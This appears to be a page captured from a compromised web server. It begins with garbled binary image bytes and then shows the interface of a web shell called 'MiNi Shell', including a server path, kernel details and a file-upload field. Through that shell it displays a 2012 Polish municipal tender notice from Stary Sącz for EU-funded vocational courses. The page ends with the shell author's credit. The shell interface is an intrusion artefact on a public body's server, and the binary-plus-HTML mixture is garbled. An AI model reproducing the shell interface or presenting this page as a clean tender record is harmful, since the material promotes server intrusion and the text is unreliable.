JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120618/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120618/207442-N-2012.html

<p class="kh_header"><b>Stary Sącz: Wykonanie usług szkoleniowych w 2012 roku - kursów zawodowych w ramach projektu Program aktywizacji społecznej i zawodowej - Czas na aktywność w Grodzie Kingi współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, zwane dalej warsztatami, usługą szkoleniową, szkoleniem, kursem</b><br>
<b>Numer ogłoszenia: 207442 - 2012; data zamieszczenia: 18.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stary Sącz , ul. Stefana Batorego 25, 33-340 Stary Sącz, woj. małopolskie, tel. 18 446 02 70, faks 18 446 02 73.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług szkoleniowych w 2012 roku - kursów zawodowych w ramach projektu Program aktywizacji społecznej i zawodowej - Czas na aktywność w Grodzie Kingi współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, zwane dalej warsztatami, usługą szkoleniową, szkoleniem, kursem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie usług szkoleniowych w 2012 roku - kursów zawodowych w ramach projektu Program aktywizacji społecznej i zawodowej - Czas na aktywność w Grodzie Kingi współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego
1. Przedmiot zamówienia obejmuje realizację następujących kursów zawodowych:
1) Przedstawiciel handlowy z prawem jazdy kat. B dla 20 osób - kurs obejmuje:
1.	Kurs prawo jazdy kat. B: 30 godzin teoria + 30 godzin zajęć praktycznych,
2.	 koszty pełnych badań lekarskich wliczony w koszt kursu, 
3.	koszt przeprowadzenia egzaminu wewnętrznego i wydania zaświadczenia, wliczony w koszt kursu,
4.	zorganizowanie 1 egzaminu państwowego prawa jazdy kat. B teoretycznego i praktycznego (tj. ustalenie terminu przeprowadzenie ww. egzaminów oraz zapłacenie kosztów pierwszego egzaminu państwowego) wliczony w koszt kursu,
5.	zapewnienie uczestnikom kursu stanowisk pracy wyposażonych w niezbędne akcesoria konieczne do przeprowadzenia zajęć praktycznych,
6.	wydanie uczestnikom szkolenia odpowiednich zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji, które uczestnik szkolenia otrzyma po ukończeniu kursu.
7.	Kurs przedstawiciela handlowego: 90 godzin/osoba,
2) Kurs fryzjerski dla 5 osób 
Łączna liczba godzin szkolenia musi wynosić 120 godzin zegarowych. Program kursu musi zawierać m.in. następujące zagadnienia: zasady bhp, techniki strzyżenia, rozjaśnianie i farbowanie włosów, ondulacja, modelowanie włosów i okazjonalne upięcia, dobór koloru włosów i fryzury do typu urody. Szkolenie powinno kończyć się egzaminem wewnętrznym. 
3) Kurs komputerowy z obsługa kas fiskalnych dla 5 osób
Wymagana minimalna ilość godzin kursu (wykłady + praktyka + egzamin końcowy) 94 godziny /45 minut lekcyjnych/.
4) Kurs komputerowy dla zaawansowanych z obsługą sekretariatu dla 1 osoby
Wymagana minimalna ilość godzin kursu (wykłady + praktyka + egzamin końcowy) 
94 godziny /45 minut lekcyjnych/.
5) Kurs ciastkarza dla 1 osoby
Wymagana minimalna ilość godzin kursu (wykłady + praktyka + egzamin końcowy) - 120 godzin /45 minut lekcyjnych/.
6) Kurs kucharza małej gastronomii z elementami sztuki kelnersko - barmańskiej dla 3 osób
Wymagana minimalna ilość godzin kursu (wykłady + praktyka + egzamin końcowy) - 120 godzin /45 minut lekcyjnych/.
7) Kurs forysta - dekorator dla 4 osób 
Wymagana minimalna ilość godzin kursu (wykłady + praktyka +egzamin końcowy) 120 godzin lekcyjnych /45 minut każda.
8) Kurs magazynier dla 1 osoby 
Wymagana minimalna ilość godzin kursu (wykłady + praktyka + egzamin końcowy) - 80 godzin /45 minut lekcyjnych/.
9) Kurs operator koparko - ładowarki dla 1 osoby 
Wymagana minimalna ilość godzin kursu (wykłady + praktyka +egzamin końcowy) 176 godzin lekcyjnych /45 minut lekcyjnych/.
10) Kurs masażu dla 1 osoby 
Wymagana minimalna ilość godzin kursu (wykłady + praktyka +egzamin końcowy) 120 godzin lekcyjnych /45 minut lekcyjnych/.
11) Kurs krawiectwa dla 2 osób 
Wymagana minimalna ilość godzin kursu (wykłady + praktyka +egzamin końcowy) 176 godzin lekcyjnych /45 minut lekcyjnych/.
12) Kurs opiekun osób starszych i niepełnosprawnych  dla 3 osób 
Wymagana minimalna ilość godzin kursu (wykłady + praktyka +egzamin końcowy) 120 godzin lekcyjnych /45 minut lekcyjnych/.
13) Kurs komputerowy AUTOCAD dla 1 osoby
Wymagana minimalna ilość godzin kursu (wykłady + praktyka +egzamin końcowy) 30 godzin lekcyjnych /45 minut lekcyjnych/.
14) Kurs operator żurawia wieżowego IŻ dla 1 osoby 
Wymagana minimalna ilość godzin kursu (wykłady + praktyka +egzamin końcowy) 120 godzin lekcyjnych /45 minut lekcyjnych/, (badania psychologiczne) - szkolenie zakończone egzaminem UDT -IŻ
15) Kurs ochrona osób i mienia dla 1 osoby 
Wymagana minimalna ilość godzin kursu (wykłady + praktyka +egzamin końcowy) 245 godzin lekcyjnych /45 minut lekcyjnych/.

2. Wymagania dotyczące przedmiotu zamówienia:
- Realizacja zamówienia odbywać się będzie na podstawie umowy z jednym wykonawcą. Wykonanie usługi warsztatowej rozliczane będzie na podstawie  jednej faktury wystawionej po realizacji całości zamówienia.
- Wykonawca bierze na siebie pełną odpowiedzialność za szkody wyrządzone Zleceniodawcy lub osobom trzecim w wyniku nienależytej realizacji usługi.
- Zamówienie wykonywane jest na terenie miasta Nowego Sącza lub Starego Sącza.
- W przypadku wymogu przy danym kursie badań lekarskich - Wykonawca zobowiązany jest do  zorganizowania tych badań i zapłacenia za te badania.
- Wykonawcę obciążają wszystkie koszty związane z wykonaniem usługi.
- Kursy zorganizowane przez Wykonawcę, muszą się zakończyć wydaniem certyfikatów, zaświadczeń potwierdzających ich ukończenie oraz nabytych podczas warsztatów umiejętności.
- Wydane certyfikaty zaświadczenia muszą być oznakowane logo Europejskiego Funduszu Społecznego i logo Programu Operacyjnego Kapitał Ludzki, powinny również zawierać:
a)	tytuł projektu
b)	informacje o współfinansowaniu ze środków Europejskiego Funduszu Społecznego
c)	okres realizacji kursu
d)	tematykę zajęć w raz z wyszczególnioną ilością godzin
e)	zaświadczenie wydane na podstawie § 6 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r.
- Wykonawca zobowiązany jest do uzgodnienia z Zamawiającym harmonogramu każdego kursu i przedłożenia go najpóźniej do dnia podpisania umowy, przesłania jednego kompletu materiałów do akceptacji oraz przedstawienie planu kursu zgodnie z załącznikiem nr 1 do umowy.
- Wykonawca ma obowiązek dostarczyć pełną dokumentację kursów tj.:
a)	listy obecności potwierdzające udział uczestników w kursach. Lista obecności musi zostać sporządzona odrębnie na każde zajęcia i być opatrzona podpisem osoby prowadzącej. 
b)	listy odbioru materiałów
c)	listę odbioru certyfikatów i zaświadczeń
d)	kserokopię certyfikatów i zaświadczeń
e)	ksero ankiet ewaluacyjnych 
f)	ksero dzienników zajęć
- Wykonawca przeprowadzając kursy zobowiązany jest do zapewnienia warunków zgodnych z przepisami bezpieczeństwa i higieny pracy w trakcie warsztatów, w tym ubioru. 
- Wykonawca będzie realizował kursy w układzie od poniedziałku do piątku, w taki sposób, aby nie przekraczały 6-8 godzin lub w zależności od specyfiki szkolenia i dopuszczalnej normy. 
- Wykonawca będzie realizował warsztaty w układzie od poniedziałku do piątku,  w taki sposób, aby nie przekraczały one 8 godziny dydaktycznych (45 minut) od godziny 800 do godziny 2000.
- Wykonawca zobowiązany jest do promowania Unii Europejskiej (UE), Europejskiego Funduszu Społecznego (EFS) oraz Programu Operacyjnego Kapitał Ludzki (POKL) poprzez umieszczenie w miejscu odbywania warsztatów i kursów, na wszystkich materiałach związanych z przeprowadzeniem warsztatów i kursów, w szczególności na dokumentach dotyczących przebiegu realizacji warsztatów i kursów, materiałach szkoleniowych, wydawanych dyplomach, certyfikatach lub innych zaświadczeniach logo Unii Europejskiej, Europejskiego Funduszu Społecznego oraz logo Programu Operacyjnego Kapitał Ludzki oraz informacji: Program aktywizacji społecznej i zawodowej - Czas na aktywność w Grodzie Kingi - współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, użyte logotypy i sformułowania muszą być zgodne z aktualnymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, przygotowanymi przez Ministerstwo Rozwoju Regionalnego, dostępna na stronie internetowej: http://www.pokl.wup-krakow.pl
- Wykonawca przygotowuje i przekazuje nie odpłatnie uczestnikom kursów materiały szkoleniowe składające się z:
a)	kołonotatnika (na spirali podwójnej; strony: w kratkę, z marginesem, perforowane, dziurkowane; twarda oprawa; format A4 - 160 kartek), 
b)	długopisu żelowego (dwukulkowego, końcówka igłowa; gumowy uchwyt; grubość linii pisania 0,5 mm; z wkładem koloru: niebieskiego)
c)	prezentacji szkolenia w formie papierowej (3 slajdy na stronie, z możliwością dopisania odręcznych notatek)
d)	jeżeli specyfika kursu tego wymaga to Wykonawca przekazuje również ubranie robocze, podręczniki 
e)	na potrzeby dokumentacji projektowej jeden egzemplarz materiałów w formie papierowej oraz jeden w formie elektronicznej zostanie przekazany Zamawiającemu w celu archiwizacji i udokumentowania kursów. Wykonawca nie przekazuje Zamawiającemu ubrań roboczych.
- Wykonawca zapewnia salę szkoleniową na terenie Nowego Sącza lub Starego Sącza, w ramach kursów, z dostępem do zaplecza sanitarnego, wyposażonej w sprzęt do przeprowadzenia szkoleń: projektor multimedialny wraz z ekranem, laptop,  flipcharty z kartkami papieru oraz kompletem markerów, oraz sprzęt potrzebny do przeprowadzenia zajęć praktycznych, odpowiednio doświetloną.
- Wykonawca zapewnia dwie 15 minutowe przerwy kawowe w trakcie każdego dnia zajęć teoretycznych i praktycznych.
a)	Wykonawca zapewni każdemu uczestnikowi kursów dostęp do bufetu kawiarnianego składającego się z (proporcje gramaturowe winny wynosić nie mniej):
a)	kawa (parzona i rozpuszczalna) 		bez ograniczeń
b)	herbata (w torebkach) 			bez ograniczeń
c)	cukier 						bez ograniczeń
d)	śmietanka					bez ograniczeń
e)	cytryna/sok cytrynowy 			bez ograniczeń
f)	sok 						0,5  litra na osobę
g)	woda mineralna 				0,5 litra na osobę
h)	drobne ciasteczka 				100 gram na osobę
i)	owoce 						200 gram owoców
- Wykonawca zapewnia zastawę stołową (talerze, sztućce, literatki, filiżanki) - filiżanki, literatki i talerzyki na ciastka w liczbie wystarczającej do możliwości przeprowadzenia 2 przerw bez konieczności mycia brudnej części zastawy.
- Wykonawca zapewnia ciągły odbiór brudnej części zastawy po każdej z przerw.
- Wykonawca na swój koszt  zobowiązany jest do zagospodarowania we własnym zakresie odpadów pokonsumpcyjnych zgodnie z obowiązującymi przepisami.
- Wykonawca zapewnia serwetki bez ograniczeń.
- Wykonawca zapewnia czajnik bez przewodowy do podgrzania wody.
- Wykonawca zapewnia bufet kawiarniany i gwarantuje, że dostarczone produkty żywnościowe będą świeże.
- Wykonawca będzie przygotowywał, dostarczał i wydawał produkty do bufetu kawiarnianego  zachowując wymogi sanitarno - epidemiologiczne.
- Wykonawca zobowiązany  jest do przestrzegania wymogów sanitarnych. Zamawiający w każdej chwili może wnioskować o przeprowadzenie kontroli Sanepidu. 
- Zamawiający zastrzega sobie możliwość dokonania zwrotu produktów w bufecie kawiarnianym w razie wystąpienia nieprawidłowości jakościowych. W miejsce zakwestionowanych produktów muszą być w trybie pilnym dostarczone właściwe.
- Zamawiający zastrzega sobie prawo kontroli wielkości porcji.
- Zamawiający zastrzega sobie prawo dokonywania kontroli realizacji zamówienia, podczas trwania kursów.
- Koszty realizacji przedmiotu zamówienia obejmują zakres usług wyszczególnionych w rozdziale II niniejszej specyfikacji, które Wykonawca będzie musiał ponieść w celu należytego wykonania przedmiotu zamówienia. 
- Wykonawca zobowiązuje się do zapewnienia Kadry osób realizujących zamówienie spośród specjalistów posiadających odpowiednie kwalifikacje i doświadczenie, dzięki którym przedmiot zamówienia zostanie zrealizowany z należytą starannością.
- Wykonawca oznacza pomieszczenia, w których odbywać się będą warsztaty poprzez umieszczenie materiałów informacyjnych dostarczonych przez Zamawiającego przed rozpoczęciem zajęć. 
- Wykonawca umożliwi pracownikom Zamawiającego przeprowadzenie kontroli prawidłowości realizacji warsztatów oraz podda się ewentualnej kontroli Instytucji Wdrażającej (Wojewódzki Urząd Pracy w Krakowie), a także udzieli stosownych wyjaśnień w obszarze związanym z przedmiotem zamówienia, na każde jej żądanie. 
- Zamawiający dopuszcza wykonanie części  zamówienia przy posłużeniu się innymi podmiotami - podwykonawcami. Jeżeli Wykonawca powierzy część zamówienia podwykonawcom, to Zamawiający na podstawie art. 36 ust. 4 ustawy żąda wskazania przez wykonawcę w ofercie tej części zamówienia, której wykonanie powierzy podwykonawcom.
- Wykonawca natychmiastowo informuje telefonicznie Zamawiającego o nie zgłoszeniu się uczestnika na warsztaty lub rezygnacji z kursu.
- Zamawiający nie dopuszcza możliwości prowadzenia kursów metodą e- learning. 
- Zamawiający nie zamierza zawierać umowy ramowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem uczestnictwa w postępowaniu jest posiadanie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od OC w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Weryfikacja spełnienia tego warunku będzie następować w oparciu o oryginał lub kserokopię poświadczoną za zgodność z oryginałem opłaconej polisy. Polisa na kwotę nie mniejszą niż 50000,00 zł brutto (słownie: pięćdziesiąt tysięcy złoty 00/100).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca załączy do oferty aktualny na dany rok kalendarzowy wpis do rejestru instytucji szkoleniowych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w razie wystąpienia, przynajmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia w zakresie zmian wynagrodzenia, terminu wykonania umowy, sposobu i zakresu wykonania umowy, osób wymienionych w umowie i wykonujących określone czynności:
a)	zmiana obowiązującej stawki VAT; Jeśli zmiana stawki VAT będzie powodować zmniejszenie lub zwiększenie kosztów wykonania umowy Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie zmniejszonego lub zwiększonego podatku zapłaconego przez wykonawcę.
b)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez zamawiającego umowy o dofinansowanie projektu systemowego lub wytycznych dotyczących realizacji zamówienia;
c)	zmiana zakresu rzeczowego lub wynagrodzenia w razie rezygnacji z realizacji części przedmiotu  umowy i zmiana umowy w tym zakresie spowodowana rozwiązaniem lub zmianą umowy o realizację projektów lub zmiany w wysokości środków finansowych przeznaczonych na realizację projektów w poszczególnych latach budżetowych, a także wskazanego zmniejszenia liczby uczestników. 
d)	zmiany danych organizacyjnych czy administracyjnych dotyczących stron  np. zmiana nr rachunku bankowego, dokumentów potwierdzających uregulowanie płatności wobec podwykonawców; zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy stronami 
e)	wynikłe z nieprzewidzianych okoliczności, siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.stary.sacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej, w Starym Sączu, ul. S. Batorego 15; 33 - 340 Stary Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2012 godzina 08:00, miejsce: Ośrodek Pomocy Społecznej, w Starym Sączu, ul. S. Batorego 15; 33 - 340 Stary Sącz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Program aktywizacji społecznej i zawodowej - czas na aktywność w Grodzie Kingi współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com